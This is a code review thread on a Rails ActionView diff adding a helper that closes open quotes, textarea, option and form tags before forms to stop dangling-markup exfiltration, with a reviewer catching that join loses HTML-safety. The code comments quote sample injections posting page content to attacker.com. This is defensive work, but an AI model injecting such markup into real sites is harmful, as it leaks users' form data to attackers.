actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

```diff
@@ -0,0 +1,73 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers
+    module ContentExfiltrationPreventionHelper
+      mattr_accessor :prepend_content_exfiltration_prevention, default: false
+
+      # Close any open attributes before each form tag. This prevents attackers from
+      # injecting partial tags that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <meta http-equiv="refresh" content='0;URL=https://attacker.com?
+      #
+      # The HTML following this tag, up until the next single quote would be sent to
+      # https://attacker.com. By closing any open attributes, we ensure that form
+      # contents are never exfiltrated this way.
+      CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze
+
+      # Close any open tags that support CDATA (textarea, xmp) before each form tag.
+      # This prevents attackers from injecting unclosed tags that could capture
+      # form contents.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com"><textarea>
+      #
+      # The HTML following this tag, up until the next `</textarea>` or the end of
+      # the document would be captured by the attacker's <textarea>. By closing any
+      # open textarea tags, we ensure that form contents are never exfiltrated.
+      CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze
+
+      # Close any open option tags before each form tag. This prevents attackers
+      # from injecting unclosed options that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com"><option>
+      #
+      # The HTML following this tag, up until the next `</option>` or the end of
+      # the document would be captured by the attacker's <option>. By closing any
+      # open option tags, we ensure that form contents are never exfiltrated.
+      CLOSE_OPTION_TAG = "</option>".html_safe.freeze
+
+      # Close any open form tags before each new form tag. This prevents attackers
+      # from injecting unclosed forms that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      # <form action="https://attacker.com">
+      #
+      # The form elements following this tag, up until the next `</form>` would be
+      # captured by the attacker's <form>. By closing any open form tags, we
+      # ensure that form contents are never exfiltrated.
+      CLOSE_FORM_TAG = "</form>".html_safe.freeze
+
+      CONTENT_EXFILTRATION_PREVENTION_MARKUP = [
+        CLOSE_QUOTES_COMMENT,
+        CLOSE_CDATA_COMMENT,
+        CLOSE_OPTION_TAG,
+        CLOSE_FORM_TAG
+      ].join.freeze
```

Comment:
I'm surprised / doubtful that this is working correctly.

Specifically: while `+` preserves the html-safety of the involved strings, `join` does not (because it's an array method, so SafeBuffer can't override it).

This change is obviously passing the tests as-is, but I speculate that's because (when this setting is enabled) we produce a correct-looking string, but it's not marked as HTML-safe (so it would get incorrectly escaped if inserted into ERB content, say).

Assuming I'm right: let's add a test to assert that the result of `form_tag` is still html-safe when the setting is enabled... and then probably just switch this to use `+`; any other alternative seems more messy for a trivial saving.

Reply:
Oh wow you're absolutely right. I added a test and it failed. Switching to `+` works like a charm :)